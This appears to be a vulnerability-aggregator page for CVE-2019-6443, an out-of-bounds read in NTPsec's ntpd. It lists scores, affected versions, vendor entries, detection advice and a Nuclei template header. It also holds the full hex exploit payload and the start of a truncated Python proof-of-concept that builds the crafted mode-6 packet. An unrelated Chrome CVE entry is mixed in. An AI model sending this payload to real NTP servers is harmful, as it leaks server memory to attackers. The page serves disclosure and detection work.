CVE-2019-6443
published 2019-01-16CVE-2019-6443: An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in…
PriorityP180critical9.1CVSS 3.0
AVNACLPRNUINSUCHINAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
66.88%
99.2th percentile
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | ntpsec | < ntpsec 1.1.3+dfsg1-1 (bookworm) | ntpsec 1.1.3+dfsg1-1 (bookworm) |
| chrome_chrome | — | — | |
| ntpsec | ntpsec | < 1.1.3 | 1.1.3 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
4e0203ec0000000000000002c774633d1000af2c2c2c2cfa0000fa0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b060b0bce0b140b0b0b0b0b0b0b0b0b0b0b0b0b0b0b210b0b0b0b0b0b0b0b0b0b0b0b0b0b0b060b0bce0b0b0b0b0b0b0b0b0b0be4e4e50b0b0b0b200b0b0b0b0b0b0b3d633dac0b0b0b0b2d270b0b0b0b0b0b0b0b0b0b0b0b0b800b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0bff0b
bytes
160203e80000000000000000
- →Send crafted NTP control request (mode 6) UDP payload to port 123 and check response for 'ntpsec' banner string to identify vulnerable NTPsec instances; version string below 1.1.3 confirms vulnerability.
- →Extract NTPsec version from ntpd response banner using regex pattern 'ntpd ntpsec-([0-9.]+)' and flag versions less than 1.1.3.
- →Shodan query 'ntpsec' can be used to identify internet-exposed NTPsec instances for passive detection.
- →The exploit sends an oversized crafted NTP control (mode 6) UDP datagram to trigger the stack-based buffer over-read in ctl_getitem/read_sysvars; monitor for anomalously large or malformed NTP control packets on UDP/123.
- →Affected versions are ntpsec 1.1.1 and 1.1.2; any response identifying these versions should be treated as vulnerable. ↗
- ·The PoC explicitly notes it does not crash the target, meaning exploitation is stealthy and may not produce obvious crash/error indicators in logs. ↗
- ·The vulnerability is in the NTP control protocol (mode 6), which may be accessible remotely; ensure NTP control queries are restricted by ACL in ntpd configuration.
CVSS provenance
nvdv3.09.1CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:P
osv9.1CRITICAL
vulncheck9.1CRITICAL
vendor_debian9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Chrome
Stable Channel Update for Desktop: CVE-2020-6443
vendor_chrome·2020-04-07·CVSS 8.8
CVE-2020-6443 [LOW] Stable Channel Update for Desktop: CVE-2020-6443
Stable Channel Update for Desktop
CVE-2020-6443: Insufficient data validation in developer tools. Reported by @lovasoa (Ophir LOJKINE) on 2020-01-08
[$N/A][ 922882 ] Low CVE-2020-6444: Uninitialized Use in WebRTC
Reported by mlfbrown on 2019-01-17
Severity: low
Debian
CVE-2019-6443: ntpsec - An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem,...
vendor_debian·2019·CVSS 9.1
CVE-2019-6443 [CRITICAL] CVE-2019-6443: ntpsec - An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem,...
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
Scope: local
bookworm: resolved (fixed in 1.1.3+dfsg1-1)
bullseye: resolved (fixed in 1.1.3+dfsg1-1)
forky: resolved (fixed in 1.1.3+dfsg1-1)
sid: resolved (fixed in 1.1.3+dfsg1-1)
trixie: resolved (fixed in 1.1.3+dfsg1-1)
GHSA
GHSA-v24q-v22h-25r2: An issue was discovered in NTPsec before 1
ghsa_unreviewed·2022-05-14
CVE-2019-6443 [CRITICAL] CWE-125 GHSA-v24q-v22h-25r2: An issue was discovered in NTPsec before 1
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
OSV
CVE-2019-6443: An issue was discovered in NTPsec before 1
osv·2019-01-16·CVSS 9.1
CVE-2019-6443 [CRITICAL] CVE-2019-6443: An issue was discovered in NTPsec before 1
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
VulnCheck
ntpsec ntpsec Out-of-bounds Read
vulncheck·2019·CVSS 9.1
CVE-2019-6443 [CRITICAL] ntpsec ntpsec Out-of-bounds Read
ntpsec ntpsec Out-of-bounds Read
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
Affected: ntpsec ntpsec
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.zscaler.com/resources/industry-reports/non-web-attack-surface-report.pdf
No detection rules found.
Exploit-DB
NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC)
exploitdb·2019-01-16·CVSS 9.1
CVE-2019-6443 [CRITICAL] NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC)
NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC)
---
#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-oobread1
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: ntpsec 1.1.1, 1.1.2
# CVE: CVE-2019-6443
# Note: this PoC does not crash the target
import sys
import socket
buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" +
"\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x
Nuclei
NTPsec > 1.1.3 - 'ctl_getitem' Out-of-Bounds Read
nuclei·CVSS 9.1
CVE-2019-6443 [CRITICAL] NTPsec > 1.1.3 - 'ctl_getitem' Out-of-Bounds Read
NTPsec > 1.1.3 - 'ctl_getitem' Out-of-Bounds Read
NTPsec before 1.1.3 contains a stack-based buffer over-read caused by a bug in ctl_getitem in read_sysvars in ntp_control.c in ntpd, letting local or remote attackers read sensitive memory, exploit requires sending crafted control requests.
Template:
id: CVE-2019-6443
info:
name: NTPsec > 1.1.3 - 'ctl_getitem' Out-of-Bounds Read
author: pussycat0x,0x_Akoko
severity: critical
description: |
NTPsec before 1.1.3 contains a stack-based buffer over-read caused by a bug in ctl_getitem in read_sysvars in ntp_control.c in ntpd, letting local or remote attackers read sensitive memory, exploit requires sending crafted control requests.
impact: |
Attackers can read sensitive memory contents, potentially leading to information disclosure or further
No writeups or analysis indexed.
https://dumpco.re/blog/ntpsec-bugshttps://dumpco.re/bugs/ntpsec-oobread1https://github.com/ntpsec/ntpsec/blob/NTPsec_1_1_3/NEWShttps://www.exploit-db.com/exploits/46175/https://dumpco.re/blog/ntpsec-bugshttps://dumpco.re/bugs/ntpsec-oobread1https://github.com/ntpsec/ntpsec/blob/NTPsec_1_1_3/NEWShttps://www.exploit-db.com/exploits/46175/
2019-01-16
Published
Exploited in the wild